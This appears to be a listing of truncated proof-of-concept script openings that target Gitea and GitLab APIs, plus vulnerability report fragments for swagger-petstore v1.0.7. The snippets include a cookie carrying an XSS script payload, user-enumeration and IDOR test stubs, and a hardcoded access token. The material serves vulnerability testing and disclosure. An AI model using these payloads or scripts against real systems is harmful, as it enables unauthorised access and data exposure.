| import requests | |
| import json | |
| import time | |
| # Target | |
| host = "192.168.126.129" | |
| port = 3000 | |
| base_url = f"http://{host}:{port}" | |
| # Original token from the sample |
| import requests | |
| TARGET_URL = "http://GITEAHOST/" | |
| cookies = { | |
| 'lang': 'en-US"><script>alert("XSS")</script>' | |
| } |
| import requests | |
| import json | |
| def test_user_enumeration(base_url, token, start_id=1, end_id=10): | |
| """ | |
| Test for user enumeration vulnerability by trying sequential user IDs | |
| :param base_url: Base API URL (e.g., 'http://192.168.126.129:9980') | |
| :param token: PRIVATE-TOKEN value | |
| :param start_id: Starting user ID to test | |
| :param end_id: Ending user ID to test |
| import requests | |
| from urllib.parse import urljoin | |
| # Configure the target address and request headers | |
| BASE_URL = "http://DEPLOYED_GITLAB_HOST" | |
| ENDPOINT = "/api/v4/user/keys" | |
| HEADERS = { | |
| "Accept": "application/json", | |
| "PRIVATE-TOKEN": "YOUR_TOKEN" | |
| } |
| import requests | |
| import json | |
| import time | |
| def test_extended_vulnerabilities(): | |
| base_url = "http://GITLAB_HOST/api/v4/snippets" | |
| original_token = "7_pwYNpdf9HZAZr1pkEy" # valid token | |
| headers = { | |
| "Accept": "application/json", |
| import requests | |
| import json | |
| import time | |
| def test_idor_vulnerabilities(): | |
| host = "DEPLOYED_GITLAB_HOST" | |
| port = "DEPLOYED GITLAB_PORT" | |
| url = f"http://{host}:{port}/api/v4/ci/lint" | |
| headers = { |
| [Description]: | |
| An issue in petstore v1.0.7 allows a remote attacker to obtain sensitive information by requesting the non-existent endpoint /cart. The server returns a 404 error page that exposes sensitive information, including the Servlet name (default) and server version. | |
| [Vulnerability Type]: | |
| Information Disclosure Vulnerability | |
| [Vendor of Product]: | |
| https://github.com/swagger-api/swagger-petstore | |
| [Affected Product Code Base]: |
| [Description]: | |
| Cross Site Scripting (XSS) vulnerability in petstore v1.0.7 allows a remote attacker to execute arbitrary code via a crafted script to the /api/v3/pet interface. | |
| [Vulnerability Type]: | |
| Cross Site Scripting (XSS) | |
| [Vendor of Product]: | |
| https://github.com/swagger-api/swagger-petstore | |
| [Affected Product Code Base]: |
| [Description]: | |
| An issue in petstore v1.0.7 allows a remote attacker to perform arbitrary delete operations via the DELETE /pet/{petId} endpoint by bypassing API key authentication. | |
| [Vulnerability Type]: | |
| Incorrect Access Control | |
| [Vendor of Product]: | |
| https://github.com/swagger-api/swagger-petstore | |
| [Affected Product Code Base]: |